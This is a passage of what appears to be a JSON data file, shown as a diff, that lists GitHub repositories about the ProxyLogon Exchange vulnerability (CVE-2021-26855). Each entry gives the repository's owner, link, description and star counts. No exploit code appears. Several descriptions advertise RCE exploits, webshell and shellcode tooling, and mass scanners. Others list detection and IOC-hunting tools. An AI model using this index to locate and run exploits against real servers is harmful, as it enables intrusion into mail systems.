"pussycat0x\/CVE-2021-26855-SSRF", + "owner": { + "login": "pussycat0x", + "id": 65701233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65701233?v=4", + "html_url": "https:\/\/github.com\/pussycat0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pussycat0x\/CVE-2021-26855-SSRF", + "description": "This script helps to identify CVE-2021-26855 ssrf Poc", + "fork": false, + "created_at": "2021-03-06T19:03:00Z", + "updated_at": "2024-08-12T20:10:57Z", + "pushed_at": "2021-03-10T07:41:56Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855-ssrf", + "microsoft-exchange", + "poc", + "proxylogon", + "ssrf" + ], + "visibility": "public", + "forks": 12, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345228496, + "name": "CVE-2021-26855-SSRF-Exchange", + "full_name": "La3B0z\/CVE-2021-26855-SSRF-Exchange", + "owner": { + "login": "La3B0z", + "id": 10507748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10507748?v=4", + "html_url": "https:\/\/github.com\/La3B0z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/La3B0z\/CVE-2021-26855-SSRF-Exchange", + "description": "CVE-2021-26855 SSRF Exchange Server", + "fork": false, + "created_at": "2021-03-07T00:55:16Z", + "updated_at": "2022-11-09T18:11:26Z", + "pushed_at": "2021-03-06T18:57:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345337490, + "name": "exchange_proxylogon", + "full_name": "mekhalleh\/exchange_proxylogon", + "owner": { + "login": "mekhalleh", + "id": 5225129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5225129?v=4", + "html_url": "https:\/\/github.com\/mekhalleh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mekhalleh\/exchange_proxylogon", + "description": "Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]", + "fork": false, + "created_at": "2021-03-07T12:12:16Z", + "updated_at": "2021-09-12T03:30:10Z", + "pushed_at": "2021-03-29T08:42:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 345567206, + "name": "CVE-2021-26855_SSRF", + "full_name": "Yt1g3r\/CVE-2021-26855_SSRF", + "owner": { + "login": "Yt1g3r", + "id": 12625147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12625147?v=4", + "html_url": "https:\/\/github.com\/Yt1g3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yt1g3r\/CVE-2021-26855_SSRF", + "description": "POC of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865, ProxyLogon poc", + "fork": false, + "created_at": "2021-03-08T07:28:21Z", + "updated_at": "2024-08-12T20:11:01Z", + "pushed_at": "2021-03-11T03:28:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855", + "proxylogon" + ], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 345595529, + "name": "CVE-2021-26855", + "full_name": "hackerxj007\/CVE-2021-26855", + "owner": { + "login": "hackerxj007", + "id": 23031720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23031720?v=4", + "html_url": "https:\/\/github.com\/hackerxj007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackerxj007\/CVE-2021-26855", + "description": "CVE-2021-26855 exp", + "fork": false, + "created_at": "2021-03-08T09:12:27Z", + "updated_at": "2024-04-17T21:48:53Z", + "pushed_at": "2021-03-08T08:09:01Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 73, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 73, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 345639477, + "name": "proxylogscan", + "full_name": "dwisiswant0\/proxylogscan", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/proxylogscan", + "description": "A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).", + "fork": false, + "created_at": "2021-03-08T11:54:32Z", + "updated_at": "2024-11-16T19:54:13Z", + "pushed_at": "2022-03-02T15:41:29Z", + "stargazers_count": 158, + "watchers_count": 158, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855", + "cve-2021-27065", + "microsoft-exchange", + "microsoft-exchange-proxylogon", + "microsoft-exchange-server", + "proxylogon", + "ssrf" + ], + "visibility": "public", + "forks": 23, + "watchers": 158, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 345955330, + "name": "ExchangeWeaknessTest", + "full_name": "mauricelambert\/ExchangeWeaknessTest", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/ExchangeWeaknessTest", + "description": "This script test the CVE-2021-26855 vulnerability on Exchange Server.", + "fork": false, + "created_at": "2021-03-09T09:40:29Z", + "updated_at": "2021-03-09T09:43:55Z", + "pushed_at": "2021-03-09T09:42:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exchange", + "microsoft", + "python3", + "security", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345970212, + "name": "Exchange_IOC_Hunter", + "full_name": "DCScoder\/Exchange_IOC_Hunter", + "owner": { + "login": "DCScoder", + "id": 42096735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42096735?v=4", + "html_url": "https:\/\/github.com\/DCScoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DCScoder\/Exchange_IOC_Hunter", + "description": "CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065", + "fork": false, + "created_at": "2021-03-09T10:36:44Z", + "updated_at": "2021-03-17T10:22:07Z", + "pushed_at": "2021-03-17T10:22:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 346033440, + "name": "CVE-2021-26855-PoC", + "full_name": "srvaccount\/CVE-2021-26855-PoC", + "owner": { + "login": "srvaccount", + "id": 76211832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76211832?v=4", + "html_url": "https:\/\/github.com\/srvaccount", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/srvaccount\/CVE-2021-26855-PoC", + "description": "PoC exploit code for CVE-2021-26855", + "fork": false, + "created_at": "2021-03-09T14:27:06Z", + "updated_at": "2023-08-09T18:23:58Z", + "pushed_at": "2021-03-09T21:59:53Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346078570, + "name": "CVE-2021-26855", + "full_name": "h4x0r-dz\/CVE-2021-26855", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2021-26855", + "description": null, + "fork": false, + "created_at": "2021-03-09T16:54:39Z", + "updated_at": "2024-08-12T20:11:03Z", + "pushed_at": "2021-03-09T16:56:09Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 61, + "watchers": 99, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 346241102, + "name": "CVE-2021-26855_PoC", + "full_name": "alt3kx\/CVE-2021-26855_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-26855_PoC", + "description": null, + "fork": false, + "created_at": "2021-03-10T05:21:19Z", + "updated_at": "2024-08-25T10:12:12Z", + "pushed_at": "2021-03-12T16:19:50Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 53, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 346816198, + "name": "CVE-2021-26855", + "full_name": "r0xdeadbeef\/CVE-2021-26855", + "owner": { + "login": "r0xdeadbeef", + "id": 65211256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4", + "html_url": "https:\/\/github.com\/r0xdeadbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0xdeadbeef\/CVE-2021-26855", + "description": " CVE-2021-26855, also known as Proxylogon, is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.", + "fork": false, + "created_at": "2021-03-11T19:35:35Z", + "updated_at": "2024-08-12T20:11:07Z", + "pushed_at": "2024-01-01T17:04:45Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346834084, + "name": "CVE-2021-26855", + "full_name": "hackerschoice\/CVE-2021-26855", + "owner": { + "login": "hackerschoice", + "id": 57636453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57636453?v=4", + "html_url": "https:\/\/github.com\/hackerschoice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackerschoice\/CVE-2021-26855", + "description": "PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github", + "fork": false, + "created_at": "2021-03-11T20:51:48Z", + "updated_at": "2024-08-12T20:11:07Z", + "pushed_at": "2021-03-11T20:58:08Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 61, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 346840803, + "name": "HAFNIUM-Microsoft-Exchange-0day", + "full_name": "SCS-Labs\/HAFNIUM-Microsoft-Exchange-0day", + "owner": { + "login": "SCS-Labs", + "id": 67705746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67705746?v=4", + "html_url": "https:\/\/github.com\/SCS-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SCS-Labs\/HAFNIUM-Microsoft-Exchange-0day", + "description": "CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065", + "fork": false, + "created_at": "2021-03-11T21:18:29Z", + "updated_at": "2021-04-19T19:31:47Z", + "pushed_at": "2021-04-19T19:31:45Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "agency-security", + "cve-2021-26855", + "cve-2021-26857", + "cve-2021-26858", + "cve-2021-27065", + "detections", + "microsoft-exchange", + "microsoft-exchange-server", + "mitigations", + "proxylogon", + "timeline", + "tweets", + "zeroday" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 347064151, + "name": "CVE-2021-26855-Scanner", + "full_name": "KotSec\/CVE-2021-26855-Scanner", + "owner": { + "login": "KotSec", + "id": 80525807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80525807?v=4", + "html_url": "https:\/\/github.com\/KotSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KotSec\/CVE-2021-26855-Scanner", + "description": "Scanner and PoC for CVE-2021-26855 ", + "fork": false, + "created_at": "2021-03-12T12:47:41Z", + "updated_at": "2023-08-21T15:37:11Z", + "pushed_at": "2021-03-12T12:55:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 347638787, + "name": "proxylogon", + "full_name": "hakivvi\/proxylogon", + "owner": { + "login": "hakivvi", + "id": 67718634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4", + "html_url": "https:\/\/github.com\/hakivvi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakivvi\/proxylogon", + "description": "RCE exploit for Microsoft Exchange Server (CVE-2021-26855).", + "fork": false, + "created_at": "2021-03-14T13:04:07Z", + "updated_at": "2024-09-06T00:15:06Z", + "pushed_at": "2022-04-23T03:21:44Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855" + ], + "visibility": "public", + "forks": 6, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 347658157, + "name": "Exch-CVE-2021-26855", + "full_name": "ZephrFish\/Exch-CVE-2021-26855", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/Exch-CVE-2021-26855", + "description": "CVE-2021-26855: PoC (Not a HoneyPoC for once!)", + "fork": false, + "created_at": "2021-03-14T14:23:34Z", + "updated_at": "2024-09-01T16:32:41Z", + "pushed_at": "2021-03-15T18:56:38Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 347774757, + "name": "ProxyLogon-CVE-2021-26855", + "full_name": "mil1200\/ProxyLogon-CVE-2021-26855", + "owner": { + "login": "mil1200", + "id": 18125445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18125445?v=4", + "html_url": "https:\/\/github.com\/mil1200", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mil1200\/ProxyLogon-CVE-2021-26855", + "description": "RCE exploit for ProxyLogon vulnerability in Microsoft Exchange", + "fork": false, + "created_at": "2021-03-14T22:57:21Z", + "updated_at": "2024-08-12T20:11:12Z", + "pushed_at": "2021-03-14T23:03:12Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 347900434, + "name": "ExchangeSSRFtoRCEExploit", + "full_name": "evilashz\/ExchangeSSRFtoRCEExploit", + "owner": { + "login": "evilashz", + "id": 50722929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4", + "html_url": "https:\/\/github.com\/evilashz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilashz\/ExchangeSSRFtoRCEExploit", + "description": "CVE-2021-26855 & CVE-2021-27065", + "fork": false, + "created_at": "2021-03-15T09:02:40Z", + "updated_at": "2024-08-12T20:11:13Z", + "pushed_at": "2021-03-15T09:19:45Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855", + "cve-2021-27065", + "proxylogon" + ], + "visibility": "public", + "forks": 10, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 347961970, + "name": "Exch-CVE-2021-26855_Priv", + "full_name": "ZephrFish\/Exch-CVE-2021-26855_Priv", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/Exch-CVE-2021-26855_Priv", + "description": "patched to work", + "fork": false, + "created_at": "2021-03-15T12:33:04Z", + "updated_at": "2023-03-01T05:35:13Z", + "pushed_at": "2022-10-08T02:30:28Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 347992754, + "name": "CVE-2021-26855-d", + "full_name": "Mr-xn\/CVE-2021-26855-d", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2021-26855-d", + "description": null, + "fork": false, + "created_at": "2021-03-15T14:03:16Z", + "updated_at": "2024-08-12T20:11:13Z", + "pushed_at": "2021-03-15T14:08:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 348253285, + "name": "ProxyLogon", + "full_name": "RickGeex\/ProxyLogon", + "owner": { + "login": "RickGeex", + "id": 7975904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7975904?v=4", + "html_url": "https:\/\/github.com\/RickGeex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickGeex\/ProxyLogon", + "description": "ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.", + "fork": false, + "created_at": "2021-03-16T07:31:25Z", + "updated_at": "2024-09-24T09:07:26Z", + "pushed_at": "2021-05-01T17:20:15Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 348300485, + "name": "ProxyLogon", + "full_name": "Immersive-Labs-Sec\/ProxyLogon", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/ProxyLogon", + "description": "Chaining CVE-2021-26855 and CVE-2021-26857 to exploit Microsoft Exchange", + "fork": false, + "created_at": "2021-03-16T10:14:56Z", + "updated_at": "2021-03-24T16:54:40Z", + "pushed_at": "2021-03-22T09:22:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 348408422, + "name": "Scan-Vuln-CVE-2021-26855", + "full_name": "shacojx\/Scan-Vuln-CVE-2021-26855", + "owner": { + "login": "shacojx", + "id": 19655109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19655109?v=4", + "html_url": "https:\/\/github.com\/shacojx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shacojx\/Scan-Vuln-CVE-2021-26855", + "description": null, + "fork": false, + "created_at": "2021-03-16T15:59:17Z", + "updated_at": "2024-08-12T20:11:15Z", + "pushed_at": "2021-03-18T10:52:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 348568793, + "name": "ProxyLogon-CVE-2021-26855-metasploit", + "full_name": "TaroballzChen\/ProxyLogon-CVE-2021-26855-metasploit", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/ProxyLogon-CVE-2021-26855-metasploit", + "description": "CVE-2021-26855 proxyLogon metasploit exploit script", + "fork": false, + "created_at": "2021-03-17T03:32:19Z", + "updated_at": "2024-08-12T20:11:16Z", + "pushed_at": "2021-03-17T05:51:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26855", + "metasploit", + "proxylogon" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 348573564, + "name": "ProxyLogon", + "full_name": "p0wershe11\/ProxyLogon", + "owner": { + "login": "p0wershe11", + "id": 80803923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80803923?v=4", + "html_url": "https:\/\/github.com\/p0wershe11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0wershe11\/ProxyLogon", + "description": "ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)", + "fork": false, + "created_at": "2021-03-17T03:56:54Z", + "updated_at": "2024-11-06T12:58:35Z", + "pushed_at": "2021-03-17T05:06:18Z", + "stargazers_count": 121, + "watchers_count": 121, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2021-26855", + "cve-2021-26855-ssrf", + "cve-2021-27065", + "exploit", + "microsoft-exchange", + "microsoft-exchange-proxylogon", + "microsoft-exchange-server", + "proxylogon", + "zeroday" + ], + "visibility": "public", + "forks": 33, + "watchers": 121, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 349035798, + "name": "CVE-2021-26855-exploit-Exchange", + "full_name": "shacojx\/CVE-2021-26855-exploit-Exchange", + "owner": { + "login": "shacojx", + "id": 19655109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19655109?v=4", + "html_url": "https:\/\/github.com\/shacojx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shacojx\/CVE-2021-26855-exploit-Exchange", + "description": null, + "fork": false, + "created_at": "2021-03-18T10:45:54Z", + "updated_at": "2024-08-25T10:11:19Z", + "pushed_at": "2021-04-05T02:36:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 349915444, + "name": "CVE-2021-26855-Exchange-RCE", + "full_name": "catmandx\/CVE-2021-26855-Exchange-RCE", + "owner": { + "login": "catmandx", + "id": 50922013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50922013?v=4", + "html_url": "https:\/\/github.com\/catmandx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/catmandx\/CVE-2021-26855-Exchange-RCE", + "description": "Microsoft Exchange Proxylogon Exploit Chain EXP分析", + "fork": false, + "created_at": "2021-03-21T06:16:24Z", + "updated_at": "2021-03-21T06:16:24Z", + "pushed_at": "2021-03-18T00:55:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 350620709, + "name": "CVE-2021-26855-CVE-2021-27065", + "full_name": "hictf\/CVE-2021-26855-CVE-2021-27065", + "owner": { + "login": "hictf", + "id": 43127173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43127173?v=4", + "html_url": "https:\/\/github.com\/hictf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hictf\/CVE-2021-26855-CVE-2021-27065", + "description": "analytics ProxyLogo Mail exchange RCE", + "fork": false, + "created_at": "2021-03-23T07:37:47Z", + "updated_at": "2021-03-23T19:02:32Z", + "pushed_at": "2021-03-23T19:02:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 350906098, + "name": "proxylogon-exploit", + "full_name": "praetorian-inc\/proxylogon-exploit", + "owner": { + "login": "praetorian-inc", + "id": 8173787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8173787?v=4", + "html_url": "https:\/\/github.com\/praetorian-inc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/praetorian-inc\/proxylogon-exploit", + "description": "Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.", + "fork": false, + "created_at": "2021-03-24T01:12:48Z", + "updated_at": "2024-08-12T20:11:29Z", + "pushed_at": "2021-03-24T01:25:05Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 45, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 352785704, + "name": "SharpProxyLogon", + "full_name": "Flangvik\/SharpProxyLogon", + "owner": { + "login": "Flangvik", + "id": 23613997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23613997?v=4", + "html_url": "https:\/\/github.com\/Flangvik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Flangvik\/SharpProxyLogon", + "description": "C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection ", + "fork": false, + "created_at": "2021-03-29T21:10:34Z", + "updated_at": "2024-11-27T04:42:18Z", + "pushed_at": "2021-03-31T11:57:38Z", + "stargazers_count": 240, + "watchers_count": 240, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 240, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 357875949, + "name": "ProxyVulns", + "full_name": "hosch3n\/ProxyVulns", + "owner": { + "login": "hosch3n", + "id": 29953808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29953808?v=4", + "html_url": "https:\/\/github.com\/hosch3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hosch3n\/ProxyVulns", + "description": "[ProxyLogon] CVE-2021-26855 & CVE-2021-27065 Fixed RawIdentity Bug Exploit. [ProxyOracle] CVE-2021-31195 & CVE-2021-31196 Exploit Chains. [ProxyShell] CVE-2021-34473 & CVE-2021-34523 & CVE-2021-31207 Exploit Chains.", + "fork": false, + "created_at": "2021-04-14T11:12:30Z", + "updated_at": "2024-11-25T03:44:15Z", + "pushed_at": "2022-10-21T08:59:23Z", + "stargazers_count": 174, + "watchers_count": 174, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 174, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 359403469, + "name": "106362522", + "full_name": "Nick-Yin12\/106362522", + "owner": { + "login": "Nick-Yin12", + "id": 82452652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82452652?v=4", + "html_url": 